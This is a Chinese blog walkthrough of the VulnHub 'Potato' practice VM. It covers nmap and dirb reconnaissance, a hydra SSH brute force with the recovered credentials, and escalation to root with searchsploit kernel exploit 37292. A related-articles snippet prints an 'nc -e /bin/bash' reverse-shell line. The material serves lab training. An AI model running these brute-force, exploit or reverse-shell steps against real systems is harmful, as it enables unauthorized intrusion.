vlunhub之potato

最新推荐文章于 2024-01-03 21:20:29 发布
最新推荐文章于 2024-01-03 21:20:29 发布
阅读量2.5k 收藏
点赞数
分类专栏: vulnhub靶场 文章标签: web 安全漏洞 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50688050/article/details/117427907
版权

目录

 

信息搜集

扫描网段

扫描端口

扫描网站目录

发现漏洞

尝试爆破

登录

提权

查看内核版本找到合适的poc

信息搜集

扫描网段

nmap -sP 192.168.179.0/24

扫描端口

nmap -sS -sV -p- -v 192.168.179.129

扫描网站目录

dirb http://192.168.179.129/

发现漏洞

挨个进这几个页面去看一看,只知道一个phpinfo界面,找到一个算是敏感信息泄露的漏洞,其他的就没有什么搞头了

只能转变思路去搞7120端口,因为是ssh服务所以可以尝试连接,然后就想到有没有可能是弱口令,尝试加载个字典跑一下

尝试爆破

hydra -L 用户名字典 -P 密码字典 ssh://192.168.179.129:7120

说实话这个账号密码我是真没跑出来,参考别人的博客账号是potato,密码是letmein

登录

ssh potato@192.168.179.129 -p 7120

提权

查看内核版本找到合适的poc

uname -a

在kali中另起一个终端搜索

searchsploit ubuntu 3.13.0-24

下载37292到本地,不过我这个本地有,就进到相应的文件夹下编译该poc

 

 

 

 

 

多说一句可能会编译失败,可以尝试完整安装一下gcc

我把编译好后的文件重命名为exp且放在/var/www/html/目录下,可以进到该目录查看一下。

利用python开启http服务

python -m SimpleHTTPServer 8000

 

下载exp到potapo

我这里是因为已经上传过一次了

接下来就是查看权限,给权限,执行poc,拿到root权限一气呵成

 

 

 

 

 

 

鲨鱼辣椒k
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vlunhub靶机一Kioptrix
willow_liang的博客
01-29 1157
Kioptrix Level 1 (#1) 1.查找靶机ip地址 1.使用nbtscan查找
Vulnhubpotato.zip
01-12
Vulnhubpotato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
随机账号密码生成工具F版.
05-20
随机账号密码生成
盘古石杯电子取证比赛WP
wild_smart_cuber的博客
05-14 5347
盘古石杯电子取证比赛WP
(全网究极无敌详细)vlunhub靶机渗透:HACKME2!
m0_70065235的博客
10-14 163
(究极无敌详细小白一看就会)hackme2靶机渗透报告
googleplay一直下载中_potato下载安装 potato 一直连接中 potato软件
weixin_39739661的博客
12-20 1169
potato软件使用的人越来越多,但是怎么安装下载呢?请点击上面的 蓝色公众号 potato软件 关注就可以。potato一直连接中,上不去等怎么办,关注上面的公众号就可以解决傍晚的夕阳伴着青山慢慢的落下,滚滚的黄河之水向着大河奔流而去,要是想把千里的风景欣赏够,那就需要爬的更高一点,登的更高才可以看的更远,potato安卓pc ios 安装包 请关注上面的公众号 potato软...
[完整]首届盘古石杯电子数据取证大赛晋级赛Writeup
啥都弄
05-11 1万+
通过Potato得到com.pim.imm,搜索得到数据库文件夹坚果pro3/data/data/com.qim.imm/databases/im_db_225_18969939616_8AF2C81F-58C2-8459-C492-9C4F65E6BC1E.db之后分析表得知,该表为聊天记录,使用gpt写脚本,进行base64解码原理如下:打开文件,对文件中的第三列除去第一行的其他内容进行base64解码,并生成新文件a.xls。
potato
03-16
土豆 -------------------------------------------
Potato靶机测试
m0_56375711的博客
08-21 1512
potato靶机渗透
1-Vlunhub--GIGACHAD
weixin_45873667的博客
06-08 418
前言:小菜鸟在努力 也是学渗透不久,慢慢了解深入,坚持每天能够弄明白一个靶机! Vlunhub–GIGACHAD 首先因为虚拟机无法分配IP需要我们手动 配置网卡: 将虚拟机打开: 按e进入编辑模式, 这里显示的网卡是ens33 修改 网卡:vi /etc/network/interfaces 将网络切换为nat模式,获得IP:192.168.159.155 配置好之后重新启动 开始复现: nmap -sn -vv -n -PE 192.168.159.0/24 --min-rate=2000 -s
vlunhub系列之breach靶机
hanjinming110的博客
08-11 358
cat shell.txt nc -e /bin/bash 192.168.110.22 5555 将其成功的写入到这个文件中,我们使用/usr/bin/tee目录,将这个文件写入到/usr/share/cleanup/tiduup.sh中。cat /usr/share/cleanup/tidyup.sh nc -e /bin/bash 192.168.110.22 5555 成功的将脚本写入到找个文件中,等待可执行脚本的运行。
potatoInstaller.exe potato potatochat
03-03
potatoInstaller.exe potato potatochat
Seed Potato Technology
05-13
The potato is one of the most important food crops in the world. This statement can be illustrated by the following facts. First of all, the potato crop is grown on a significant scale in more than ...
POTATO
03-31
土豆来自波旁战争成员的令人满意的mod特征: 为我们的任务框架提供支持加载量BFT标记观众ACRE无线电配置管理员工具针对我们社区的游戏性调整执照 该项目是完全开源的,欢迎所有贡献。 只要您所做的更改根据GNU通用...
那是你的计算机怎么用英语表示,“I potato you”可不是“我土豆你”,那这个potato到底啥意思?...
weixin_42347346的博客
07-24 377
关于potato——土豆我们分享过好多词组了,比如说hot potato表示烫手山芋或特别棘手的问题,big potato表示大人物,small potato表示小人物。本期我们再来分享几个特别有意思的词组或句子,比如“I potato you”,很多同学都不知道这个potato要怎么理解。“I potato you”可不是“我土豆你”,那这个potato到底啥意思?1)I potato youI...
Selenium 代理时打开页面,出现弹窗需要登录账号密码
H_sen's Blog
09-15 324
一句话 使用此代理没设置白名单,设置个白名单就好了。
雅思词汇真经单词共3674个
热门推荐
xunpic的博客
11-19 8万+
雅思词汇真经 / 雅思词汇真经共3674个单词 / 雅思高频词汇 / 雅思听力词汇 / 雅思词汇表 / Vocabulary for IELTS / 学为贵 赢未来 / 英语真经派学习法 一本书精通雅思词汇 / 刘洪波 编著 / 涵盖:雅思必备核心词汇+刘洪波老师原创雅思考点词库 逻辑词群记忆法,一群一群记单词,快速备考无负责 时尚插图,趣味说文解字,看了就忘不掉 用法、搭配全面掌握,单词用得好,考分就是高
土豆聊天poeato Chat注册账号时提示网络刺错误怎么解决
bizhu0684的博客
06-03 5069
potato chat是一款新推出的即时聊天工具,支持windows、mac、linux、ios、android、web多平台2.软件下载成功之后点击注册,提示网络错误我在手机上面下载了一个刺猬加速器就解决了这个问题根据自己的设备选择软件下载 注册登录刺猬加速软件点击选择服务器,然后点击链接链接成功之后,我们在打开poeato Chat填写验证码注册成功,可以开始和朋友聊天了...
vlunhub-Lampiao靶机通关(超详细)
最新发布
weixin_53730939的博客
01-03 462
vlunhub-Lampiao靶机通关(超详细)
potato.apk
10-15
Potato.apk是一个应用程序文件。APK是Android应用程序的扩展名。Potato.apk可以是一个由开发者创建的基于Android系统的应用程序。 这个应用程序可能与土豆有关,但无法准确确定它的功能。它可能是一个提供有关土豆种植、烹饪或健康食谱的应用程序。用户可能可以通过Potato.apk了解如何选择、储存和烹饪土豆。这个应用程序可能包括有关土豆的营养成分、健康益处和菜谱建议的信息。 Potato.apk也可能是一个游戏应用程序,与土豆有关。它可能是一个与土豆相关的益智游戏或模拟游戏,让玩家体验种植土豆或制作土豆菜肴的过程。这个应用程序可能包括有关土豆的小知识、种植技巧和快乐的游戏挑战。 无论Potato.apk是一个有关土豆的教育应用程序还是一个娱乐游戏,它提供了一种与土豆有关的互动体验。用户可以通过这个应用程序了解土豆的信息、学习如何种植土豆或享受与土豆有关的游戏。无论用户是土豆爱好者、厨师还是农场主,Potato.apk可能提供了一个有趣和有用的应用程序来满足他们的需求和兴趣。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值